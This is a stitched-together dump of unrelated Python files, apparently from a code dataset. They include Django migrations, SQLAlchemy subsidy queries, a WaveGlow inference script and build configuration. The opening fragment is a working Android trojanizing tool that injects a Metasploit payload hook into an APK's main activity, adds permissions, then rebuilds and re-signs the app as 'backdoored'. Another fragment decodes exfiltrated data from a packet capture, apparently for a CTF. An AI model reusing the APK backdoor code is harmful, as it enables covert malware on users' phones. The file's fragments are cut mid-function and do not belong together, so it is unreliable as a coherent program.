cp = "cp temp/smali/com/metasploit/stage/Payload* %s/smali/com/metasploit/stage/"%mainapk.split('.')[0]
os.system(cp)
filemanifest = "%s/AndroidManifest.xml"%mainapk.split('.')[0]
fhandle = open(filemanifest,'r')
fread = fhandle.read()
fhandle.close()
fread = fread.split('<action android:name="android.intent.action.MAIN"/>')[0].split('<activity android:')[1]
acn = re.search('android:name=\"[\w.]+',fread)
activityname = acn.group(0).split('"')[1]
acpath = activityname.replace('.','/') + ".smali"
smalipath = "%s/smali/%s"%(mainapk.split('.')[0], acpath)
fhandle = open(smalipath,'r')
fread = fhandle.read()
fhandle.close()
print pyc.Info("Injecting hooks in %s..."%activityname)
fhalf = fread.split(";->onCreate(Landroid/os/Bundle;)V")[0]
shalf = fread.split(";->onCreate(Landroid/os/Bundle;)V")[1]
injection = ";->onCreate(Landroid/os/Bundle;)V\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
total = fhalf + injection + shalf
fhandle = open(smalipath,'w')
fhandle.write(total)
fhandle.close()
print pyc.Succ("Hook injected -> metasploit/stage/Payload")
def permissions(mainapk):
print pyc.Info("Adding permissions...")
filemanifest = "temp/AndroidManifest.xml"
fhandle = open(filemanifest,'r')
fread = fhandle.readlines()
prmns = []
for line in fread:
if('<uses-permission' in line):
prmns.append(line.replace('\n',''))
fhandle.close()
filemanifest = "%s/AndroidManifest.xml"%mainapk.split('.')[0]
fhandle = open(filemanifest,'r')
fread = fhandle.readlines()
half=[]
for line in fread:
if('<uses-permission' in line):
prmns.append(line.replace('\n',''))
else:
half.append(line)
prmns = set(prmns)
fhandle.close()
fhandle = open(filemanifest,'w')
for i in half:
if half.index(i)==2:
for j in prmns:
fhandle.write(j+"\n")
else:
fhandle.write(i)
for i in prmns:
print '\t',i.split('android:name="')[1].split('"')[0]
print pyc.Succ("%d Permissions added."%(len(prmns)))
def rebuild(mainapk):
print pyc.Info("Recompiling...")
rebuild = "bash apktool.sh b -f %s"%mainapk.split('.')[0]
os.system(rebuild)
print pyc.Info("Signing apk...")
path = "%s/dist/%s"%(mainapk.split('.')[0],mainapk)
signapk = "java -jar signapk.jar cert.x509.pem privatekey.pk8 %s %s-final.apk"%(path,mainapk[:-4])
os.system(signapk)
print pyc.Succ("Successfully backdoored and saved as %s-final.apk"%mainapk[:-4])
|
436 | de347b41cd88947690cb42e043880a80d81e2c5c | # Generated by Django 3.2.7 on 2021-09-11 19:38
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter Order.created_at to a nullable IntegerField.

    NOTE(review): an integer created_at presumably stores a Unix
    timestamp — confirm against the model before relying on it.
    """

    dependencies = [
        ('cryptocurrency', '0012_rename_cancel_exists_order_cancel_exist'),
    ]

    operations = [
        migrations.AlterField(
            model_name='order',
            name='created_at',
            field=models.IntegerField(blank=True, null=True),
        ),
    ]
|
437 | c26bdc3f47aa9ac0cda0334e97bdaf3f9d56eb6c | import re
import os
import base64
os.popen("tshark -r log.pcap -d 'tcp.port==57000,http' -d 'tcp.port==44322,http' -d 'tcp.port==44818,http' -Y 'data-text-lines' -Tfields -e http.file_data > request")
def evals(text):
    """Decode obfuscated ``__doc__``-indexing payload text back to characters.

    The captured payload builds characters via expressions such as
    ``0['__doc__'][12]``; each match is rewritten into a real Python
    expression (``int.__doc__[12]``) and evaluated, and the literal
    result is substituted back into the text.

    NOTE: Python 2 only — relies on ``map()`` returning a list (``+=``
    on the result would fail on Python 3).
    """
    # Matches e.g. 0['__doc__'][12]-style sub-expressions
    template = "{}\['__doc__'\]\[\d+\]"
    keys = map(str, range(10))
    keys += ['\[\]','\(\)',"''"]
    rule = '|'.join(template.format(_) for _ in keys)
    # Also capture bare single-character literals like 'a'
    regex = re.compile(rule + "|'[\w|\d]'")
    for i in regex.findall(text):
        # Rewrite the obfuscated snippet into an eval()-able expression
        r = i.replace("['__doc__']", ".__doc__")
        r = re.sub('^\d', 'int', r)
        r = re.sub('^\(\)', 'tuple', r)
        # NOTE(review): eval() on captured traffic is dangerous in general;
        # acceptable here only because the regex restricts what is evaluated.
        text = text.replace(i, eval(r))
    text = text.replace('\n', '\\n')
    # '~' is filler in the payload encoding; strip it
    return text.replace('~','')
def extract(text):
    """Pull ``(offset, filename, index, char)`` out of a decoded request.

    Returns the capture groups of the first match as a 4-tuple of
    strings; raises IndexError when the text does not match.
    """
    pattern = r'-s (\d+) -l \d+ ([\w\.]+)\).*\[(\d+)\].*\((\w|\d|\\n)\)'
    matches = re.findall(pattern, text)
    return matches[0]
requ = open('request').readlines()[:]
result = dict()
for x in requ:
clean = x.strip('\n')
clean = re.sub(r'\\n', '', clean)
clean = base64.b64decode(clean)
clean = evals(clean.split('=')[1])
if 'index' in clean:
index, name, pos, char = extract(clean)
key = result.get(name, dict())
index = int(index)
pos = int(pos)
if not key:
result[name] = key
lastIndexed = result[name].get(index, dict())
if not lastIndexed:
result[name][index] = lastIndexed
lastOccurence = result[name][index].get(pos, [''])
if not lastOccurence[0]:
result[name][index][pos] = lastOccurence
lastOccurence[0] = (index, pos, char)
for k,v in result.iteritems():
print '[+] Saving', k
temp = ''
for kk in sorted(v):
vv = result[k][kk]
for kkk in sorted(vv):
vvv = result[k][kk][kkk]
char = vvv[0][-1]
if char != '\\n':
temp += vvv[0][-1]
with open(k, 'wb') as f:
content = temp.decode('hex')
f.write(content) |
438 | 8e85740123467889bdeb6b27d5eaa4b39df280ed | from .celery import app
from home.models import Banner
from settings.const import BANNER_COUNT
from home.serializers import BannerModelSerializer
from django.core.cache import cache
from django.conf import settings
@app.task
def update_banner_list():
    """Celery task: refresh the cached home-page banner list.

    Returns True on completion.
    """
    # Fetch the latest visible, non-deleted banners, highest `orders` first
    banner_query = Banner.objects.filter(is_delete=False, is_show=True).order_by('-orders')[:BANNER_COUNT]
    # Serialize to plain dicts
    banner_data = BannerModelSerializer(banner_query, many=True).data
    for banner in banner_data:
        # Prefix relative image paths with the site base URL
        banner['image'] = settings.END_BASE_URL + banner['image']
    # Update the cache (no timeout argument: uses the backend default)
    cache.set('banner_list', banner_data)
    return True
|
439 | a2421a8673a524c32539555596711a71a8e00dbf | import os
import argparse
import torch
import model.model as module_arch
from utils.util import remove_weight_norms
from train import get_instance
from librosa import load
from librosa.output import write_wav
from time import time
def main(config, resume, infile, outfile, sigma, dur, half):
    """Run WaveGlow inference: wav -> mel-spectrogram -> resynthesized wav.

    config:  parsed training config dict (architecture, sample rate, n_gpu)
    resume:  path to the checkpoint to load
    infile:  input wave file used to compute the mel-spectrogram
    outfile: output wave file path
    sigma:   sampling temperature for WaveGlow inference
    dur:     max duration (seconds) of audio to load, or None for all
    half:    if True, run the model and mel input in fp16
    """
    # build model architecture
    model = get_instance(module_arch, 'arch', config)
    model.summary()

    # load state dict
    checkpoint = torch.load(resume)
    state_dict = checkpoint['state_dict']
    # Checkpoints saved from DataParallel have 'module.'-prefixed keys,
    # so wrap before loading and unwrap after.
    if config['n_gpu'] > 1:
        model = torch.nn.DataParallel(model)
    model.load_state_dict(state_dict)
    if config['n_gpu'] > 1:
        model = model.module
    model.apply(remove_weight_norms)

    # prepare model for testing
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    model = model.to(device)
    model.eval()

    sr = config['arch']['args']['sr']
    y, _ = load(infile, sr=sr, duration=dur)
    y = torch.Tensor(y).to(device)

    # get mel before turn to half, because sparse.half is not implement yet
    mel = model.get_mel(y[None, :])
    if half:
        model = model.half()
        mel = mel.half()
    start = time()
    x = model.infer(mel, sigma)
    cost = time() - start
    # kHz = samples generated per millisecond of wall time
    print("Time cost: {:.4f}, Speed: {:.4f} kHz".format(cost, x.numel() / cost / 1000))
    # print(x.max(), x.min())
    write_wav(outfile, x.cpu().float().numpy(), sr, False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='WaveGlow inference')
parser.add_argument('infile', type=str, help='wave file to generate mel-spectrogram')
parser.add_argument('outfile', type=str, help='output file name')
parser.add_argument('--duration', type=float, help='duration of audio, in seconds')
parser.add_argument('--half', action='store_true')
parser.add_argument('-s', '--sigma', type=float, default=1.0)
parser.add_argument('-r', '--resume', default=None, type=str,
help='path to latest checkpoint (default: None)')
parser.add_argument('-d', '--device', default=None, type=str,
help='indices of GPUs to enable (default: all)')
args = parser.parse_args()
if args.resume:
config = torch.load(args.resume)['config']
if args.device:
os.environ["CUDA_VISIBLE_DEVICES"] = args.device
main(config, args.resume, args.infile, args.outfile, args.sigma, args.duration, args.half)
|
440 | 23a560c5f5553fc32329121ea47f8a7ae1196889 | import requests
import time
# Push a fixed sensor reading to the local API once per second, forever.
# NOTE: Python 2 syntax (`print r.text` statement).
while 1:
    r = requests.put("http://localhost:3000/api/4", data={"temperature": 24, "led": 1})
    print r.text
    time.sleep(1)
441 | 6154979cd2853dd2bd26d1ae5df7365efa0141c2 | from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer
from migrate import *
meta = MetaData()
table = Table(
'accesses', meta,
Column('id', BigInteger, primary_key=True, nullable=False),
Column('uuid', String(255), nullable=False),
Column('created_at', DateTime),
)
def upgrade(migrate_engine):
    """Create the `accesses` table on the given engine (sqlalchemy-migrate hook)."""
    meta.bind = migrate_engine
    table.create()
def downgrade(migrate_engine):
    """Drop the `accesses` table on the given engine (sqlalchemy-migrate hook)."""
    meta.bind = migrate_engine
    table.drop()
|
442 | 813354c9c294c0323c1b54cda7074fbffa49cdb3 | from django.utils import timezone
from factory import DjangoModelFactory
from djtriggers.tests.models import DummyTrigger
class DummyTriggerFactory(DjangoModelFactory):
    """Factory producing DummyTrigger instances for tests."""

    class Meta:
        model = DummyTrigger

    trigger_type = 'dummy_trigger_test'
    source = 'tests'
    # NOTE(review): timezone.now() is evaluated once at import time, so
    # every instance created by this factory shares the same timestamp.
    # factory.LazyFunction(timezone.now) is likely what was intended — confirm.
    date_received = timezone.now()
    date_processed = None
    process_after = None
    number_of_tries = 0
443 | aebc918d6a1d1d2473f74d77b8a915ac25548e3a | import cachetools
# Demo of cachetools.LRUCache: with maxsize=3, inserting a fourth key
# evicts the least-recently-used entry.
cache = cachetools.LRUCache(maxsize = 3)
cache['PyCon'] = 'India'
cache['year'] = '2017'
print("Older: " + cache['year'])
# Overwriting an existing key updates it in place (and marks it recently used)
cache['year'] = '2018'
print("Newer: " + cache['year'])
print(cache)
cache['sdate'] = '05/09/2018'
print(cache)
# Fourth distinct key: evicts the LRU entry ('PyCon')
cache['edate'] = '09/09/2018'
print(cache)
444 | d7ce6efa72c9b65d3dd3ce90f9d1f2dd8a889d26 |
'''
syntax of if-elif-else
if <condition> :
code to be
executed in
this condition
elif <new condition> :
cdode tbd
some code
else :
code runs in the else condigtion
this can all be multiline code
'''
a = 3
b = 2
# Compare a and b and report the relation.
# NOTE: Python 2 print statements below.
if a == b :
    print "Values are equal"
elif a < b :
    print "a is less than b"
else:
    print "b is less than a"
print "jai is awesome"
# attempting to make changes in git
# jai making changes
|
445 | cd234911c1f990b8029dfa792d132847bf39a6aa |
import math
def vol_shell(r1, r2):
    """Return the volume of a spherical shell with radii r1 and r2.

    Computes |4/3 * pi * (r1**3 - r2**3)| rounded to 3 decimal places;
    the absolute value makes the argument order irrelevant.
    """
    # 4.0 / 3.0 guards against integer floor division (4/3 == 1) under
    # Python 2; on Python 3 the result is identical.
    volume = abs((4.0 / 3.0) * math.pi * (r1 ** 3 - r2 ** 3))
    return round(volume, 3)
print(vol_shell(3,3))
|
446 | 7b5713c9a5afa911df1c2939751de30412162f15 | from collections import OrderedDict
import copy
import numpy as np
from scipy.optimize import curve_fit
from ... import Operation as opmod
from ...Operation import Operation
from ....tools import saxstools
class SpectrumFit(Operation):
    """
    Use a measured SAXS spectrum (I(q) vs. q),
    to optimize the parameters of a theoretical SAXS spectrum
    for one or several populations of scatterers.

    Works by minimizing an objective function that compares
    the measured spectrum against the theoretical result.

    Input arrays of q and I(q),
    a string indicating choice of objective function,
    a dict of features describing the spectrum,
    and a list of strings indicating which keys in the dict
    should be used as optimization parameters.
    The input features dict includes initial fit parameters
    as well as the flags indicating which populations to include.
    The features dict is of the same format as
    SpectrumProfiler and SpectrumParameterization outputs.

    Outputs a return code and the features dict,
    with entries updated for the optimized parameters.
    Also returns the theoretical result for I(q),
    and a renormalized measured spectrum for visual comparison.
    """

    def __init__(self):
        input_names = ['q','I','flags','params','fit_params','objfun']
        output_names = ['params','q_I_opt']
        super(SpectrumFit, self).__init__(input_names, output_names)
        self.input_doc['q'] = '1d array of wave vector values in 1/Angstrom units'
        self.input_doc['I'] = '1d array of intensity values I(q)'
        self.input_doc['flags'] = 'dict of flags indicating what populations to fit'
        self.input_doc['params'] = 'dict of initial values for the scattering equation parameters '\
        'for each of the populations specified in the input flags'
        self.input_doc['fit_params'] = 'list of strings (keys) indicating which parameters to optimize'
        self.input_doc['objfun'] = 'string indicating objective function for optimization: '\
        + 'see documentation of saxstools.fit_spectrum() for supported objective functions'
        self.output_doc['params'] = 'dict of scattering equation parameters copied from inputs, '\
        'with values optimized for all keys specified in fit_params'
        self.output_doc['q_I_opt'] = 'n-by-2 array of q and the optimized computed intensity spectrum'
        self.input_type['q'] = opmod.workflow_item
        self.input_type['I'] = opmod.workflow_item
        self.input_type['flags'] = opmod.workflow_item
        self.input_type['params'] = opmod.workflow_item
        self.inputs['objfun'] = 'chi2log'

    def run(self):
        f = self.inputs['flags']
        # Bail out early when there is nothing meaningful to fit
        if f['bad_data'] or not any([f['precursor_scattering'],f['form_factor_scattering'],f['diffraction_peaks']]):
            self.outputs['params'] = {}
            return
        if f['diffraction_peaks']:
            self.outputs['params'] = {'ERROR_MESSAGE':'diffraction peak fitting not yet supported'}
            return
        q, I = self.inputs['q'], self.inputs['I']
        m = self.inputs['objfun']
        p = self.inputs['params']
        fitkeys = self.inputs['fit_params']
        # Set up constraints as needed
        c = []
        if f['form_factor_scattering'] or f['diffraction_peaks']:
            c = ['fix_I0']
        # Fitting happens here
        p_opt = saxstools.fit_spectrum(q,I,m,f,p,fitkeys,c)
        I_opt = saxstools.compute_saxs(q,f,p_opt)
        # Compare measured and fitted spectra on the log scale,
        # restricted to strictly positive intensities
        nz = ((I>0)&(I_opt>0))
        logI_nz = np.log(I[nz])
        logIopt_nz = np.log(I_opt[nz])
        Imean = np.mean(logI_nz)
        Istd = np.std(logI_nz)
        logI_nz_s = (logI_nz - Imean) / Istd
        logIopt_nz_s = (logIopt_nz - Imean) / Istd
        f['R2log_fit'] = saxstools.compute_Rsquared(np.log(I[nz]),np.log(I_opt[nz]))
        f['chi2log_fit'] = saxstools.compute_chi2(logI_nz_s,logIopt_nz_s)
        q_I_opt = np.array([q,I_opt]).T
        # BUGFIX: the declared output 'params' was never set on the
        # success path (only the undeclared 'features' key was written,
        # and the optimized parameters p_opt were discarded).
        self.outputs['params'] = p_opt
        # Kept for backward compatibility with consumers of 'features'
        self.outputs['features'] = f
        self.outputs['q_I_opt'] = q_I_opt
|
447 | 595912753d778a0fa8332f0df00e06a9da5cde93 | ################################################################################
# #
# This file is part of the Potato Engine (PE). #
# #
# Copyright (C) 2007-2010 ElectroMagnetic Potatoes (EMP). #
# See the AUTHORS file for more information. #
# #
# This library is free software; you can redistribute it and/or #
# modify it under the terms of the GNU Lesser General Public #
# License as published by the Free Software Foundation; either #
# version 2.1 of the License, or (at your option) any later version. #
# #
# This library is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# Lesser General Public License for more details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
################################################################################
import os
import build
################################################################
# Default options (will be overriden by command line switches) #
################################################################
# Parallel build
SetOption('num_jobs', 4)
# include cache
SetOption('implicit_cache', 1)
##########################################################
# Command-line parameters (overriden by localconfig.py) #
##########################################################
buildVariables = Variables("localconfig.py")
buildVariables.Add(PathVariable("QTDIR", "Qt4 root directory", "/usr/share/qt4", PathVariable.PathIsDir))
buildVariables.Add(PathVariable("OGRE_HOME", "Ogre1.6 root directory (windows only)", None, PathVariable.PathIsDir))
buildVariables.Add(PathVariable("PTHREADWIN32_HOME", "PthreadWin32 root directory (windows only)", None, PathVariable.PathIsDir))
buildVariables.Add(PathVariable("ODE_HOME", "ODE 0.11 root directory", None, PathVariable.PathIsDir))
buildVariables.Add(BoolVariable("DEBUG", "If true, build in debug configuration", False))
buildVariables.Add(BoolVariable("FORCE_MINGW", "When both MinGW and VC++ are installed, force the use of the MinGW compiler instead of the default (windows only)", False))
buildVariables.Add(BoolVariable("DISABLE_GRAPH", "Disable dependency graph generation", False))
##############################################################################
# Variable value extraction (nasty, should be updated when the API evolves) #
# The reason for having this here is that we have to access variables before #
# we can create the real construction environment (for tools selection) #
##############################################################################
currentVariables = Environment(variables = buildVariables).Dictionary()
####################
# Base environment #
####################
baseTools = ["qt"]
if os.name == "nt":
if currentVariables["FORCE_MINGW"]:
baseTools.append("mingw")
else:
baseTools.append("default")
else:
baseTools.append("default")
baseEnvironment = Environment(tools = baseTools, variables = buildVariables)
# additional variables
baseEnvironment["OSNAME"] = os.name
baseEnvironment["SYSPATH"] = os.environ["PATH"].split(os.pathsep)
if baseEnvironment["CC"] == "cl":
baseEnvironment.AppendUnique(CPPFLAGS = ["/EHsc"])
# debug symbols vs. optimization
if baseEnvironment["DEBUG"]:
if baseEnvironment["CC"] == "cl":
baseEnvironment.AppendUnique(CPPFLAGS = ["/Z7"])
else:
baseEnvironment.AppendUnique(CPPFLAGS = ["-g"])
else:
if baseEnvironment["CC"] == "cl":
baseEnvironment.AppendUnique(CPPFLAGS = ["/Ox"])
else:
baseEnvironment.AppendUnique(CPPFLAGS = ["-O2"])
# Qt tool workaround
baseEnvironment.Replace(LIBS = [])
baseEnvironment.Replace(LIBPATH = [])
baseEnvironment.Replace(CPPPATH = [])
# Qt UI builder
uiBuilder = Builder(action = '$QT_UIC $QT_UICDECLFLAGS -o ${TARGETS[0]} $SOURCE')
baseEnvironment.Append(BUILDERS = {'Ui' : uiBuilder})
# Qt RC builder
rcBuilder = Builder(action = '$QT_BINPATH/rcc $QT_RCCDECLFLAGS -o ${TARGETS[0]} $SOURCE')
baseEnvironment.Append(BUILDERS = {'Rc' : rcBuilder})
# Under windows, add the platform SDK
if os.name == "nt" and baseEnvironment["CC"] == "cl":
import _winreg
key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Microsoft SDKs\\Windows")
winSdkHome = _winreg.QueryValueEx(key, "CurrentInstallFolder")[0]
_winreg.CloseKey(key)
baseEnvironment["WINSDK_HOME"] = winSdkHome
baseEnvironment.AppendUnique(CPPPATH = ["$WINSDK_HOME/Include"])
baseEnvironment.AppendUnique(LIBPATH = ["$WINSDK_HOME/Lib"])
# Do not rely on VC++ runtime library
if os.name == "nt" and baseEnvironment["CC"] == "cl":
baseEnvironment.AppendUnique(CPPFLAGS = ["/MD"])
# Speed up change analysis
baseEnvironment.Decider('MD5-timestamp')
#####################
# Command-line help #
#####################
Help(buildVariables.GenerateHelpText(baseEnvironment))
##################################
# SCons environment declarations #
##################################
walker = build.DependencyWalker()
# external component database
for script in Glob("components.*.py"):
SConscript(script, exports = "walker", variant_dir = "build", duplicate = 0)
walker.makeEnvironments(baseEnvironment)
if not baseEnvironment["DISABLE_GRAPH"]:
walker.makeDependencyGraph("dependencies.png")
|
448 | 3b42e218acf1c93fab3a0893efa8bf32a274eb23 | # Generated by Django 2.2.6 on 2019-11-13 13:11
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make Submission review_score / total_score non-editable decimals
    (5 digits, 2 decimal places, nullable)."""

    dependencies = [
        ('interface', '0010_auto_20191104_2107'),
    ]

    operations = [
        migrations.AlterField(
            model_name='submission',
            name='review_score',
            field=models.DecimalField(decimal_places=2, editable=False, max_digits=5, null=True),
        ),
        migrations.AlterField(
            model_name='submission',
            name='total_score',
            field=models.DecimalField(decimal_places=2, editable=False, max_digits=5, null=True),
        ),
    ]
|
449 | 13b69ec61d6b2129f1974ce7cae91c84100b3b58 | import tensorflow.keras
from PIL import Image, ImageOps
from os import listdir
from os.path import isfile, join
import numpy as np
import glob
import cv2
np.set_printoptions(suppress = True)
# Load the model
model = tensorflow.keras.models.load_model('./converted_keras/keras_model.h5')
# Create the array of the right shape to feed into the keras model
# The 'length' or number of images you can put into the array is
# determined by the first position in the shape tuple, in this case 1.
data = np.ndarray(shape = (1, 224, 224, 3), dtype = np.float32)
path = glob.glob("/Users/zjisuoo/Documents/zjisuoo_git/OurChord/00_NOTE_DATA/TEST/*.png")
images = []
# Classify each note image and print the predicted note duration.
for image in path :
    n1 = cv2.imread(image)
    # BUGFIX: the model input is declared as (1, 224, 224, 3) above, but
    # images were resized to 244x244 — feed the model 224x224 instead.
    n2 = cv2.resize(n1, (224, 224))
    images.append(n2)
    print(image)

    # turn the image into a numpy array
    image_array = np.array(n2)
    # Normalize pixel values to [-1, 1] as expected by the exported model
    normalized_image_array = (image_array.astype(dtype = np.float32) / 127.0) - 1
    # BUGFIX: write into the batch slot instead of rebinding `data`,
    # which dropped the leading batch dimension.
    data[0] = normalized_image_array

    # run the inference
    prediction = model.predict(data)
    # print(prediction)
    if(prediction[0][0] > 0.8):
        print("2๋ถ์ํ")
    elif(prediction[0][1] > 0.8):
        print("4๋ถ์ํ")
    elif(prediction[0][2] > 0.8):
        print("8๋ถ์ํ")
    elif(prediction[0][3] > 0.8):
        print("16๋ถ์ํ")
    else:
        print("์ํ์๋")
450 | 68d537cb8488ae4f2c8300e885be78540952dec0 | #!/usr/bin/env python2
# coding=utf8
from __future__ import absolute_import, division, print_function
from sqlalchemy import func
from walis.model.walis import walis_session
from walis.model.zeus import zeus_session, zeus_db_handler
from walis.model.zeus.activity import (
SubsidyProcessRecord,
SubsidyPayRecord,
ActivityStats,
)
from walis.model.walis.activity import PaymentNoticeRecord as NoticeRecord
from walis.utils.time import get_today_begin_time, get_today_end_time
MAX_LIST_SIZE = 1000
DEFAULT_LIST_SIZE = 200
def get_new_pay_records(process_at, limit=200):
    """Fetch pay records with id greater than `process_at`, oldest first.

    Joins the processing record to include card_id / processed_at, and
    excludes records whose processing failed. Returns up to `limit`
    (id, restaurant_id, card_id, processed_at, status) tuples.
    """
    with zeus_session() as session:
        result = session.query(SubsidyPayRecord.id,
                               SubsidyPayRecord.restaurant_id,
                               SubsidyProcessRecord.card_id,
                               SubsidyProcessRecord.processed_at,
                               SubsidyPayRecord.status). \
            outerjoin(SubsidyProcessRecord,
                      SubsidyProcessRecord.pay_record_id == SubsidyPayRecord.id). \
            filter(SubsidyPayRecord.id > process_at). \
            filter(SubsidyProcessRecord.status != SubsidyProcessRecord.STATUS_FAIL). \
            order_by(SubsidyPayRecord.id.asc()).limit(limit).all()
    return result
def get_success_pay_records(record_ids):
with zeus_session() as session:
result = session.query(SubsidyPayRecord.id,
SubsidyPayRecord.restaurant_id,
SubsidyProcessRecord.card_id,
SubsidyProcessRecord.processed_at,). \
outerjoin(SubsidyProcessRecord,
SubsidyProcessRecord.pay_record_id == SubsidyPayRecord.id). \
filter(SubsidyPayRecord.status == SubsidyPayRecord.STATUS_SUCCESS). \
filter(SubsidyProcessRecord.status != SubsidyProcessRecord.STATUS_FAIL). \
filter(SubsidyPayRecord.id.in_(record_ids)).all()
return result
def get_activity_stats(pay_record_id):
with zeus_session() as session:
results = session.query(ActivityStats.activity_id,
ActivityStats.activity_category_id,
func.sum(ActivityStats.total_subsidy),
func.min(ActivityStats.date),
func.max(ActivityStats.date),
func.sum(ActivityStats.quantity), ).group_by(
ActivityStats.restaurant_id, ActivityStats.activity_id,
ActivityStats.activity_category_id). \
filter(ActivityStats.pay_record_id == pay_record_id). \
filter(ActivityStats.status == ActivityStats.STATUS_PAY_SUCCESS).all()
return results
def get_success_record_ids_by_restaurant(
        restaurant_id, activity_id=None, activity_category_id=None):
    """Return ids of successfully paid subsidy records for a restaurant.

    Optionally narrows the result to one activity and/or category.
    """
    with zeus_session() as session:
        query = session.query(SubsidyPayRecord.id). \
            filter(SubsidyPayRecord.restaurant_id == restaurant_id). \
            filter(SubsidyPayRecord.status == SubsidyPayRecord.STATUS_SUCCESS)

        if activity_id is not None:
            # BUG FIX: Query.filter() returns a *new* query; the result was
            # previously discarded, so these two filters never applied.
            query = query.filter(SubsidyPayRecord.activity_id == activity_id)

        if activity_category_id is not None:
            query = query.filter(
                SubsidyPayRecord.activity_category_id == activity_category_id)

        record_ids = query.all()

    return [r[0] for r in record_ids]
# Activity-stat statuses that appear in pay logs -- everything except the
# not-yet-reviewed ActivityStats.STATUS_PENDING.
PAYLOG_STATUS_LIST = {
    ActivityStats.STATUS_PAY_RECORD_GENERATED,
    ActivityStats.STATUS_PAY_SUCCESS,
    ActivityStats.STATUS_PAY_FAIL,
}


@zeus_db_handler
def query_paylog_by_rst(restaurant_id, activity_id=None,
                        activity_category_id=None, offset=None, limit=None):
    """Pay-log rows for one restaurant, grouped per (pay record, activity,
    category), newest first.  Excludes ActivityStats.STATUS_PENDING (the
    not-yet-reviewed status).

    NOTE(review): ``session`` is not defined here -- it is presumably
    injected by the @zeus_db_handler decorator, which also appears to
    execute the returned query object; confirm against the decorator.
    """
    q = session.query(
        ActivityStats.pay_record_id,
        ActivityStats.activity_id,
        ActivityStats.activity_category_id,
        ActivityStats.status,
        func.min(ActivityStats.date),
        func.max(ActivityStats.date),
        func.sum(ActivityStats.quantity),
        func.sum(ActivityStats.total_subsidy),
        SubsidyPayRecord.created_at,
        func.max(SubsidyProcessRecord.id)). \
        group_by(ActivityStats.pay_record_id,
                 ActivityStats.activity_id,
                 ActivityStats.activity_category_id). \
        outerjoin(SubsidyPayRecord,
                  SubsidyPayRecord.id == ActivityStats.pay_record_id). \
        outerjoin(SubsidyProcessRecord,
                  SubsidyProcessRecord.pay_record_id == SubsidyPayRecord.id). \
        filter(ActivityStats.restaurant_id == restaurant_id).\
        filter(ActivityStats.status.in_(PAYLOG_STATUS_LIST)).\
        order_by(SubsidyPayRecord.created_at.desc())

    if activity_id is not None:
        q = q.filter(ActivityStats.activity_id == activity_id)

    if activity_category_id is not None:
        q = q.filter(ActivityStats.activity_category_id == activity_category_id)

    # Cap the page size at MAX_LIST_SIZE; default to DEFAULT_LIST_SIZE.
    if limit is not None:
        q = q.limit(min(limit, MAX_LIST_SIZE))
    else:
        q = q.limit(DEFAULT_LIST_SIZE)

    if offset is not None:
        q = q.offset(offset)

    return q
@zeus_db_handler
def query_pay_records(restaurant_id, offset=None, limit=None):
    """Page through a restaurant's pay records, newest first.

    ``session`` is injected by @zeus_db_handler; ``limit`` is capped at
    MAX_LIST_SIZE and defaults to DEFAULT_LIST_SIZE.
    """
    q = session.query(SubsidyPayRecord).\
        filter(SubsidyPayRecord.restaurant_id == restaurant_id).\
        order_by(SubsidyPayRecord.created_at.desc())

    if limit is not None:
        q = q.limit(min(limit, MAX_LIST_SIZE))
    else:
        q = q.limit(DEFAULT_LIST_SIZE)

    if offset is not None:
        q = q.offset(offset)

    return q.all()


@zeus_db_handler
def query_paylog(pay_record_ids, activity_id=None, activity_category_id=None,
                 offset=None, limit=None):
    """Aggregated pay-log rows for the given pay record ids.

    Groups per (pay record, activity, category), sums quantity/subsidy,
    and keeps only statuses in PAYLOG_STATUS_LIST.  Returns the query
    object itself (not .all()), like query_paylog_by_rst.
    """
    q = session.query(
        ActivityStats.pay_record_id,
        ActivityStats.activity_id,
        ActivityStats.activity_category_id,
        ActivityStats.status,
        func.min(ActivityStats.date),
        func.max(ActivityStats.date),
        func.sum(ActivityStats.quantity),
        func.sum(ActivityStats.total_subsidy)).\
        group_by(ActivityStats.pay_record_id,
                 ActivityStats.activity_id,
                 ActivityStats.activity_category_id). \
        filter(ActivityStats.pay_record_id.in_(pay_record_ids)).\
        filter(ActivityStats.status.in_(PAYLOG_STATUS_LIST)).\
        order_by(ActivityStats.created_at.desc())

    if activity_id is not None:
        q = q.filter(ActivityStats.activity_id == activity_id)

    if activity_category_id is not None:
        q = q.filter(ActivityStats.activity_category_id == activity_category_id)

    if limit is not None:
        q = q.limit(min(limit, MAX_LIST_SIZE))
    else:
        q = q.limit(DEFAULT_LIST_SIZE)

    if offset is not None:
        q = q.offset(offset)

    return q


@zeus_db_handler
def get_max_subsidy_process_record_ids(pay_record_ids):
    """Latest (max-id) process record id for each of the given pay records."""
    q = session.query(func.max(SubsidyProcessRecord.id)).\
        group_by(SubsidyProcessRecord.pay_record_id).\
        filter(SubsidyProcessRecord.pay_record_id.in_(pay_record_ids))

    return q
@zeus_db_handler
def count_paylog_by_rst(restaurant_id, activity_id=None,
                        activity_category_id=None):
    """Count a restaurant's pay-log rows, excluding
    ActivityStats.STATUS_PENDING (the not-yet-reviewed status).
    """
    q = session.query(ActivityStats.id). \
        group_by(ActivityStats.pay_record_id,
                 ActivityStats.activity_id,
                 ActivityStats.activity_category_id). \
        filter(ActivityStats.restaurant_id == restaurant_id).\
        filter(ActivityStats.status.in_(PAYLOG_STATUS_LIST))

    if activity_id is not None:
        q = q.filter(ActivityStats.activity_id == activity_id)

    if activity_category_id is not None:
        q = q.filter(ActivityStats.activity_category_id == activity_category_id)

    # NOTE(review): fetches every grouped row just to count it; a count
    # over a subquery would avoid transferring the rows.
    return len(q.all())


@zeus_db_handler
def query_process_records_by_ids(process_ids):
    """Fetch SubsidyProcessRecord rows by primary-key list."""
    query = session.query(SubsidyProcessRecord).\
        filter(SubsidyProcessRecord.id.in_(process_ids))

    return query.all()


@zeus_db_handler
def get_subsidy_record_process_time(record_ids, status):
    """(pay_record_id, processed_at) pairs for the given records whose
    process record carries *status*.
    """
    return session.query(
